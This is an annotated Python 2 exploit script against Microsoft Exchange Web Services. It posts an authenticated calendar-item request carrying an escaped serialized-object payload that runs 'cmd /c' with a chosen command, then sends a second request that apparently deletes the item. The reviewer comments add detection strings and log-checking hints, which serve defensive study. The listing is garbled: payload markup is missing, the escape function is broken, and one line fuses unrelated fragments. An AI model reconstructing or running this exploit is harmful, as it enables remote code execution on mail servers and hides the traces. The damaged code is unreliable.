# Client script that sends two authenticated SOAP requests to an Exchange
# Web Services (EWS) endpoint, the first carrying an embedded object payload.
# NOTE(review): this listing is damaged. The XML markup inside both payload
# strings, the entity strings in escape(), and a stretch of code in the middle
# of the script were lost in extraction, so it does not run as shown.
# It is Python 2 code (`from urllib import quote_plus` does not exist on 3.x).
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
# time, sys, b64encode and quote_plus are not referenced in the visible text.

# Silences the warning that each verify=False request below would otherwise emit.
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

# Connection settings; host and password are left blank in the listing.
# NOTE(review): the account looks like an ordinary mailbox user, which would
# make this a post-authentication issue. The required privileges are not
# visible here -- confirm against the vendor advisory.
target = ""
username = "john"
pwd = ""
# Command line substituted into the inner payload after "cmd /c".
cmd = "mspaint.exe"


def escape(_str):
    # Runs four successive str.replace() calls over _str and returns the result.
    # NOTE(review): the replacement strings were presumably XML entities that
    # the page extraction decoded back to literal characters. As shown, the
    # first three calls replace a character with itself and the fourth has a
    # bare `"""` as its second argument.
    _str = _str.replace("&", "&")
    _str = _str.replace("<", "<")
    _str = _str.replace(">", ">")
    _str = _str.replace("\"", """)
    return _str


# Inner document. Its %s slot receives the escaped command, next to the literal
# "Start cmd /c" and an assembly-qualified Exchange type name. This is
# presumably a serialized object graph, but the element structure is missing.
# For detection, the type name and "cmd /c" inside an EWS request body are the
# distinctive strings visible here.
payload2 = """ ahihi asdasdasdasdasd <__identity i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System"/> Start cmd /c %s Microsoft.Exchange.Entities.DataModel, Version=15.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 Microsoft.Exchange.Entities.DataModel.Calendaring.CustomActions.ProposeOptionsMeetingPollParameters """ % escape( cmd)
# Escaped as a whole because it is embedded as text inside payload1.
payload2 = escape(payload2)

# Outer EWS request body. The surviving text is time-zone transition values
# and a calendar meeting (subject, body, times, attendees), with payload2
# placed in the %s slot. Presumably an item-creation request, since the
# response is mined for an item id below.
payload1 = """ Dlt/1 P0DT2H0M0.0S 4 Sunday 1 Std P0DT2H0M0.0S 10 Sunday -1 Dlt/2007 P0DT2H0M0.0S 3 Sunday 2 Std P0DT2H0M0.0S 11 Sunday 1 0 1 2007-01-01T08:00:00.000Z Weekly Update Meeting %s Come hear about how the Organized Observational Paradigm SkyNet project is coming along! 30 2021-04-22T06:45:32.868-08:00 2021-04-22T06:55:32.868-08:00 Contoso Main Gallery Administrator@evil.corp john@evil.corp mart@evil.corp 1 2021-04-22T06:45:32.868-08:00 2 """ % payload2

# First request: NTLM-authenticated POST to /ews/Exchange.asmx.
# verify=False means the TLS peer is never authenticated, so the NTLM exchange
# runs over a channel that an intermediary could terminate.
# Only Content-type is set, so the request goes out with the requests
# library's default User-Agent, which is easy to spot in IIS logs for this path.
res = requests.post(
    "https://%s/ews/Exchange.asmx" % target,
    data=payload1,
    headers={
        "Content-type": "text/xml; charset=utf-8",
    },
    verify=False,
    auth=HttpNtlmAuth('%s' % (username), pwd))
# Any status other than 200 aborts the run.
if res.status_code != 200:
    print("error 1")
    exit()
ct = res.content
# NOTE(review): text is missing from here. The split() argument, the
# extraction of change_key and the opening of the req_del template are gone,
# and the line below fuses what is left of them.
item_id = ct.split(' """ % (item_id, change_key)
# Second request: same endpoint and credentials, sending req_del built from
# item_id and change_key. Presumably it removes the item created by the first
# request (the name suggests a delete) -- TODO confirm. If so, the mailbox will
# not retain the item and server-side EWS/IIS request logs are the evidence
# to check.
res = requests.post(
    "https://%s/ews/Exchange.asmx" % target,
    data=req_del,
    headers={
        "Content-type": "text/xml; charset=utf-8",
    },
    verify=False,
    auth=HttpNtlmAuth('%s' % (username), pwd))